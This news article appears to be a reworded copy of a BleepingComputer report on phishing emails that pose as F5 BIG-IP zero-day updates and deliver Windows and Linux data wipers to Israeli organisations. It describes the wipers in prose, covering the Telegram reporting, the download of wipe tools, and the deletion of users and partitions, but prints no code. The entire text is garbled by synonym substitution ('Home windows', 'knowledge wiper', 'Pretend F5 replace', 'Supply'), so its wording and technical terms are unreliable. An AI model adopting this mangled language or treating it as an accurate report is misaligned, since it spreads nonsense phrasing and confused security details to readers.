The Israel Nationwide Cyber Directorate warns of phishing emails pretending to be F5 BIG-IP zero-day safety updates that deploy Home windows and Linux knowledge wipers.
Israel’s Nationwide Cyber Directorate (INCD) acts because the CERT liable for defending the nation from cyber threats and to warn organizations and residents about identified assaults.
Since October, Israel has been closely focused by pro-Palestinian and Iranian hacktivists, who’ve been conducting knowledge theft and data-wiping assaults on organizations within the nation.
In November, a new knowledge wiper known as BiBi Wiper was found that focused each Linux and Home windows gadgets and is believed to have been created by pro-Hamas hacktivists.
Pretend F5 replace deploys wiper
Yesterday, INCD warned of a brand new phishing assault deploying knowledge wipers by emails pretending to be a warning a few zero-day vulnerability in F5 BIG-IP gadgets.
A professional-Palestinian hacktivist group named Handala instructed BleepingComputer that they have been liable for the phishing assault, stating it was deployed on quite a few Israeli networks. BleepingComputer has not been capable of affirm these claims independently.
The phishing e mail warns that the F5 BIG-IP zero-day vulnerability is actively exploited in assaults, urging Israeli organizations to obtain and set up a safety replace earlier than their community is breached.
Supply: INCD
For Home windows customers, the e-mail pushes an executable named F5UPDATER.exe [VirusTotal], and for Linux, the file is a shell script named replace.sh [VirusTotal].
When launched, each the Home windows and Linux variations try and impersonate an F5 safety replace by displaying the corporate’s brand on the display.
For instance, the Home windows wiper will show a small display branded with the F5 brand that pretends to be a safety replace installer.
Source: BleepingComputer
When the Replace button is clicked, the wiper will ship a message containing the knowledge above the system to a Telegram channel and try and wipe all the information from the pc.
Nevertheless, in BleepingComputer’s exams, the wiper is a bit buggy, not deleting the entire knowledge on a pc.
The Linux wiper is a shell script that first downloads the applications essential to wipe the pc, that are xfsprogs, wipe, and parted.
Supply: BleepingComputer
These applications are used first to take away all customers on the system after which use the ‘wipe’ command to delete the related residence instructions.
The wiper will then try and delete all working system information and the partitions on the Linux system. When executed, the Linux laptop is rebooted to trigger the partition modifications to enter impact.
Just like the Home windows wiper, the Linux model will talk with a Telegram channel to offer details about the system and standing updates.
Information wipers have change into an enormous downside for Israel, with hacktivists generally utilizing them in harmful assaults to disrupt Israel’s operations and financial system.
As at all times, the most effective protection is just to obtain information from e mail if they arrive from a trusted and confirmed supply. Moreover, safety updates ought to solely be downloaded instantly from a {hardware} vendor, not third-party websites.
